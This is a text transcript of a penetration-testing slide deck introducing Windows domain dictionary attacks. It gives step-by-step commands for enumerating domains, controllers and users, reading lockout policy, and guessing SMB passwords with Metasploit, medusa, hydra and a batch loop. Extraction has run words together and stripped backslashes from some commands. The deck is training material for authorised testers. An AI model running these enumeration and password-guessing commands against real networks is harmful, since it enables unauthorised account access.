Introduction to Windows Dictionary Attacks


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Introduction to Windows Dictionary Attacks

  1. 1. Introduction to Windows Dictionary AttacksAuthor: Scott Sutherland
  2. 2. Who am I?Scott Sutherland• Security Consultant @ NetSPI• Over 10 years of consulting experience• Security researcher: Blogs, white papers,tools etc
  3. 3. Presentation Goals• Identify the value of dictionary attacks• Provide new penetration testers with a safeapproach to Windows dictionary attacks• Provide security professionals with questionsthey should be asking their contractors
  4. 4. Before we begin…Dictionary AttackBrute Force Attack
  5. 5. Why dictionary attacks?What are the goals?• Identify accounts configured with weak ordefault passwords – “It’s human nature”• Use accounts as entry points during penetrationtestsWhat’s the impact?• Unauthorized access to critical:‒ Systems‒ Applications‒ data• User impersonation
  6. 6. Are There Alternatives?Yes.Approaches typically includes:• Cracking pw hashes offline with:‒ Pre-computed hash libraries like RainbowTables‒ Brute force and dictionary techniques usingtools like Hashcat and John the Ripper• Dumping clear text passwords frominteractive sessions with Mimikatz
  7. 7. With Alternatives be Covered?No.
  8. 8. Dictionary Attacks: Process OverviewWindows Dictionary Attack Process1. Identify domains2. Enumerate domain controllers3. Enumerate domain users4. Enumerate domain lockout policy5. Create a dictionary6. Perform Attack
  9. 9. Identify Domains: MethodsUnauthenticated Methods• DHCP Information• NetBIOS Queries• DNS Queries• Sniffing Network Traffic• Review RDP drop down listsAuthenticated Methods• Review the output of the SET command for“USERDNSDOMAIN”• Review the registry for the default domain
  10. 10. Identify Domains: ToolsMethod Tools AuthDHCP Info IPCONFIGNoNetBIOS Queries NETSTAT –A <IP> NoDNS Queries nmap -sL <IP Range> -oA output_rnds./reverseraider -r <IP Range>./dnswalk victem.comperl -dns <domainname> -threads5 -file <domainame>-dns.outputNoSniffing Wireshark (GUI) + Filter for browser trafficNetwork Miner (GUI)Etherape (GUI)NoRDP Drop Down nmap –sS –PN –p3389 <IP Range>Then visit with RDP clientNo
  11. 11. Enumerate DCs: MethodsUnauthenticated Methods• DNS Queries• RPC Queries• Port Scanning• NetBIOS ScanningAuthenticated Methods• NET GROUP commands• LDAP Queries
  12. 12. Enumerate DCs: ToolsMethods Tools AuthDNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain>NoRPC Queries NLTEST /DCLIST <domain>FindPDC <domain> <request count>NoPort Scanning NMAP –sS –p389,636 –PN <IP Range>NoNetBIOSScanningFOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT–A %iNoNET GROUPCommandNet group “Domain Controllers” /domainYesLDAP Queries LDAP Administrator (GUI Tool)Hyena (GUI Tool)adfind -b -sc dcdmp <domain> -gc | grep -i “>name:”| gawk -F ” ” “{print $2}” | sort | uniqYes&No
  13. 13. Enumerate Domain Users: MethodsUnauthenticated Methods• RPC Queries• SID Brute Forcing• SNMP Queries• LDAP Queries• Sharepoint FuzzingAuthenticated Methods• NET USER command• WMI commands
  14. 14. Enumerate Domain Users: Tools 1Methods Tools AuthRPCEndpointsdumpsec.exe /computer=<IP> /rpt=usersonly/saveas=csv /outfile=domain_users.txtenum –N <ip>enum –U <ip>Yes&noSID BruteForcingruby c:metasploitmsf3msfcliauxiliary/scanner/smb/smb_lookupsidSMBDomain=. MaxRID=10000 RHOSTS=<IPAddress> E > domain_users.txtGetacct (GUI)Yes&noSNMPQueriesruby c:metasploitmsf3msfcliauxiliary/scanner/snmp/snmp_enumusersSMBDomain=. RHOSTS=<IP Address> EMibbrowser (GUI)SNMP WalkYes&no
  15. 15. Enumerate Domain Users: Tools 2Methods Tools AuthLDAP Queries adfind -b DC=<victim>,DC=<com> -f“objectcategory=user” -gc | grep -i“sAMAccountName:” | gawk -F “:” “{print $2}” | gawk-F ” ” “{print $1}”| sort > domain_users.txtYes&noSharepointFuzzingFuzz parameters with BURP to enumerate domainusers. Example URL below:https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2 ]Yes&noNET USERSCommandNet users /domain > domain_users.txtYesWMICommandswmic /user:<user> /password:<password> /node:<IPaddress> domain_users.txtYes
  16. 16. Get Domain Lockout Policy: MethodsUnauthenticated Methods• RPC EndpointsAuthenticated Methods• NET ACCOUNTSCommandWhat does it all mean?• Threshold, duration,and windowLockoutthreshold: 5Lockoutduration: 15Lockoutobservationwindow : 15
  17. 17. Get Domain Lockout Policy: ToolsMethods Tools AuthRPC Queries Enum –P <IP Address>dumpsec.exe /computer=<IP> /rpt=policy/saveas=csv /outfile=domain_policy.txtYes&NoNETACCOUNTSCOMMANDNET ACCOUNTSYEs
  18. 18. Create a Dictionary: MethodsClassics Still Work• Blank• Username as password• passwordCommon Formulas = Most Effective• <Password><Number>• <Companyname><Number>• <Season><Year>• <Sports team>Number>Popular Dictionaries• Metasploit dictionaries• Rock you• FuzzDB• John the ripper
  19. 19. Create a Dictionary: ToolsDictionary URLs / ListsClassics Blank passwordUsername as passwordpassword as passwordFormulas<Password><Number><Companyname><Number><Season><Year><Sports team>Number>Your Brain! Think of keywords relative to the targetcompany /geographic location and you’ll get more outof your dictionary attacks!Rockyou the Ripper
  20. 20. Perform Dictionary Attack: RulesThe Rule to Live By:Respect the lockout policy• General idea = Attempt a few passwords for allof the domain users each round, not a 1000passwords against one user• Subtract 2 attempts from the lockout policyExample: Lockout=5, Attempts=3• Wait 5 to 10 minutes beyond the observationwindow
  21. 21. Perform Dictionary Attack: ToolsTools Commands OSMedusa medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbntLinuxBruter Easy to use GUI and not CLI that I know of.WindowsMetasploitsmb_loginruby c:metasploitmsf3msfcliauxiliary/scanner/smb/smb_login THREADS=5BLANK_PASSWORDS=true USER_AS_PASS=truePASS_FILE=c:passwords.txtUSER_FILE=c:allusers.txt SMBDomain=.RHOSTS= EWindowsand LinuxHydra hydra.exe -L users.txt -P passwords.txt -ocredentials.txt <ip> smbWindowsand LinuxBatch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) donet user <ip>IPC$ /user:<user> %aWindows
  22. 22. Conclusions• There is more than one way to doeverything!• Enumerate all available options• It’s easy to lockout accounts – respect thepassword policy • Always ask contractors what their approachis to reduce the chance of account lockoutsduring penetration tests